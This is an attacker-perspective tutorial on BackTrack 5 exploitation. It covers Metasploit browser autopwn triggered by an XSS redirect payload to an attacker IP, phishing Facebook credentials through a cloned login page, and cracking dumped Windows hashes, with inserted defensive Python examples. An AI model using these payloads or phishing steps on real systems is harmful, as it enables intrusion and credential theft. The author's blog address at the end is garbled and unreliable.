BackTrack 5 Guide II: Exploitation tools and frameworks

Karthik R, Contributor 


You can read the original story here, on SearchSecurity.in.

Looking for the basics of BackTrack 5? See here. 

In the first part of this BackTrack 5 guide, we looked at information gathering and 
vulnerability assessment tools. In the second part, we will use BackTrack 5 tools to 
exploit a remote system and learn how the exploitation framework can be used with the 
privilege escalation tool John the Ripper to crack passwords and gain access to a remote 
Windows system. 



Figure 1: Metasploit Armitage. The compromised remote Windows system is marked in
red. The console below shows the browser autopwn process, exploits sent, data received,
etc. Armitage also fingerprints the target OS, as seen in the screenshot.

Metasploit Armitage

Metasploit Armitage is the GUI version of the famous Metasploit framework. We did an
entire series of Metasploit tutorials on this site last month. In this part of the BackTrack 5
guide, we will look at the browser autopwn exploit for Windows XP using Metasploit
Armitage.

Features of this attack: 

1. Use of the auxiliary module of Metasploit Armitage 

2. Around 22 exploit modules used to carry out the attack 

3. Use of the social engineering approach 

4. Auto-migration to notepad.exe from the browser process 

For this exploit, you need a site with a cross-site scripting (XSS) vulnerability that can be
used for URL redirection. The victim clicks on a particular URL in the browser, which
spawns a meterpreter shell on the victim's system. The URL redirection code will look
something like:

http://vulnerablesite?c="><meta HTTPEQUIV="REFRESH" content="0;
url=http://attackerIPaddress ">
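As an added example, not part of the original guide, the following shows the reflected-parameter bug that makes the redirect above possible, beside the escaped version that neutralises it; the page templates and hostnames are assumptions, and the payload is modelled on the URL above.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the value an attacker places in the reflected "c"
# parameter, modelled on the redirect payload shown above. The redirect
# address is a placeholder, not a real host.
PAYLOAD = '"><meta http-equiv="refresh" content="0; url=http://attacker.example">'


def render_vulnerable(c_value: str) -> str:
    """Reflects the parameter into an attribute value unescaped: the bug."""
    return f'<html><body><input name="c" value="{c_value}"></body></html>'


def render_hardened(c_value: str) -> str:
    """Same template, but <, >, & and quotes are escaped before reflection,
    so the closing quote and the <meta> tag are rendered as inert text."""
    return f'<html><body><input name="c" value="{html.escape(c_value, quote=True)}"></body></html>'


class RefreshFinder(HTMLParser):
    """Collects the content of every <meta http-equiv="refresh"> a browser would honour."""

    def __init__(self) -> None:
        super().__init__()
        self.redirects = []

    def handle_starttag(self, tag, attrs) -> None:
        a = dict(attrs)  # HTMLParser lowercases names and unescapes values
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.redirects.append(a.get("content") or "")


def meta_redirects(page: str) -> list:
    """Parse a rendered page and return the redirect directives it would trigger."""
    finder = RefreshFinder()
    finder.feed(page)
    return finder.redirects


if __name__ == "__main__":
    print("vulnerable:", meta_redirects(render_vulnerable(PAYLOAD)))
    print("hardened:  ", meta_redirects(render_hardened(PAYLOAD)))
```

The vulnerable template yields one live refresh directive; the escaped one yields none, which is the check a code reviewer wants to see pass.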


[Figure 2 screenshot: Internet Explorer with the address bar showing
http://www.xyz.com?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://192.168.13.132 ">]

Figure 2: An illustration of URL redirection from an XSS vulnerable site, xyz.com, to 192.168.13.132


The auto-migration feature moves the meterpreter session out of the browser process
into a new process (notepad.exe), because if the session is not migrated, the whole attack
terminates when the user closes the browser. Migration is therefore done automatically
to maintain prolonged access.


Social-Engineer Toolkit 


The Social-Engineer Toolkit (SET) has been covered extensively in my previous article on
this site. In this BackTrack 5 guide, I will discuss a type of attack called tab nabbing. In
this attack, the victim opens a link in a browser, but as soon as he switches to another
tab, the original page is replaced with a fake page, which allows the attacker to gain the
victim's login credentials. The victim is duped into entering his username and password
on a fake site.

In this "social engineering" attack, we choose a website attack vector and the option to
clone the website. We specify the site to clone, whose login credentials we desire to
obtain. I have cloned Facebook in this BackTrack 5 guide for demonstration purposes
only. Please note that cloning will not occur if you are not connected to the Internet
during the process.

Figure 3 of this guide shows the fake Facebook login page, and Figure 4 shows POST
data captured by SET. This method can be extended to any URL the attacker intends
to clone; provided the site submits its login form as POST data, the credentials will be
captured, whether over HTTP or HTTPS. SET supports both protocols and effectively
sniffs login credentials.



[Figure 3 screenshot: a cloned Facebook login page with Email and Password fields, a
"Keep me logged in" checkbox, the "Sign up for Facebook" and "Forgot your password?"
links, language selector and the standard Facebook footer]

Figure 3: A fake Facebook login page created by the Social Engineer Toolkit based on options set by
the attacker

Privilege escalation tools 

We may not always gain administrator or superuser access to a remote system. As an 
attacker, we need maximum privileges on the target to execute our payloads and 
perform desired actions. BackTrack 5 offers a wide range of privilege escalation tools to 
meet these needs, as shown in Figure 5 of this BackTrack 5 guide. 
[Figure 4 screenshot: the SET Credential Harvester console (root@bt:/pentest/exploits/set)
logging GET requests from 192.168.13.1 on 12/Oct/2011 and the captured POST parameters,
including PARAM: charset_test, lsd, return_session=0, legacy_return=1, display,
session_key_only=0 and default_persistent=0]

Figure 4: POST Data captured by the Social Engineer Toolkit framework from a fake Facebook login
page

As seen in Figure 5 of this BackTrack 5 guide, BackTrack 5 offers four classes of privilege
escalation tools, each specialising in a particular area.

John the Ripper 


Once the victim has been compromised (please refer to my articles on SET and MSF for
more details), the password cracker John the Ripper can be used to crack the Windows
hashes to escalate privileges and gain administrator rights to the system.

After exploitation, the hashes are dumped to a text file, and this text file is supplied to
John the Ripper. John the Ripper is a very effective tool for cracking password hashes of
remote systems once the hashes are available. Figures 6 and 7 of this BackTrack 5 guide
show the cracking processes involved in privilege escalation on a Windows system. The
attack demonstrated in this BackTrack 5 guide can be carried out with either the
Metasploit Framework or the Social Engineer Toolkit.

The remote system observed in this BackTrack 5 guide uses the following set of
usernames and passwords, as verified by John the Ripper in Figure 7.
[Figure 5 screenshot: the BackTrack 5 menu listing the categories Reverse Engineering,
Protocol Analysis, RFID Tools and Spoofing Attacks]

Figure 5: Various categories of privilege escalation tools in BackTrack 5


[Figure 6 screenshot: output of hashdump in the meterpreter shell, one line per account in
user:RID:LM-hash:NT-hash::: format for Administrator (RID 500), Guest (501), haxor,
HelpAssistant, IUSR_FACILITATOR, IWAM_FACILITATOR, metasploit, SUPPORT_388945a0
and vv]

Figure 6: The output of hashdump in the meterpreter shell which will be copied to a text file and
supplied to John the Ripper for cracking.
Figure 7: Username:password combinations are as follows: metasploit:metasploit, w:password,
haxor:haxor, administrator:admin
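An added example, not the author's, that audits a hashdump text file in the user:RID:LM:NT::: layout of Figure 6 for the weaknesses that make this cracking fast; the sample lines are constructed, and only the two well-known empty-hash constants are real values.

```python
# Constructed sample in the user:RID:LM-hash:NT-hash::: layout of the
# hashdump above. The two well-known constants are real; every other hash
# value is made up for illustration and belongs to no real system.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM_HALF = EMPTY_LM[:16]                   # one unused 7-character LM half

SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
tester:1004:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(text):
    """Parse pwdump/hashdump lines into dicts; raises on a malformed line."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def audit(records):
    """Flag what makes the cracking shown above easy: a stored LM hash is
    DES-based, case-insensitive and split into two 7-character halves, so it
    falls quickly (an empty second half also reveals the password is at most
    7 characters); an empty NT hash means the account has no password. The
    remedy for LM storage is the policy "Network security: Do not store LAN
    Manager hash value on next password change" followed by a password change."""
    findings = []
    for r in records:
        if r["lm"] != EMPTY_LM:
            if r["lm"][16:] == EMPTY_LM_HALF:
                findings.append((r["user"], "LM hash stored; password is 7 characters or fewer"))
            else:
                findings.append((r["user"], "LM hash stored"))
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "empty password"))
    return findings


if __name__ == "__main__":
    for user, issue in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{user}: {issue}")
```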

With these passwords in hand, we can now escalate our privileges on the target system.
In the protocol analysis category, we have Wireshark, a top-class network traffic
analyzer. I have covered the various applications of Wireshark in an earlier guide.

It is evident from this guide that BackTrack 5 has evolved a lot in terms of its arsenal. A 
crafty attacker can make maximum use of these tools, and combine them to maximize 
his benefits. This BackTrack 5 guide highlights the most important exploitation and 
privilege escalation tools. In the BackTrack 5 guides to come, I will cover some more 
exploitation and privilege escalation techniques. 

Head to the third part of this BackTrack 5 tutorial to learn more about exploitation
frameworks.


About the author: Karthik R is a member of the NULL community.
Karthik completed his training for EC-Council CEH in December 2010,
and is at present pursuing his final year of B.Tech. in Information
Technology from the National Institute of Technology, Surathkal. Karthik
can be contacted at rkarthik.poojary@gmail.com. He blogs
at httg^//www 1 egsilgnlgmbdgwygrdgres^





You can subscribe to our Twitter feed at @SearchSecIN.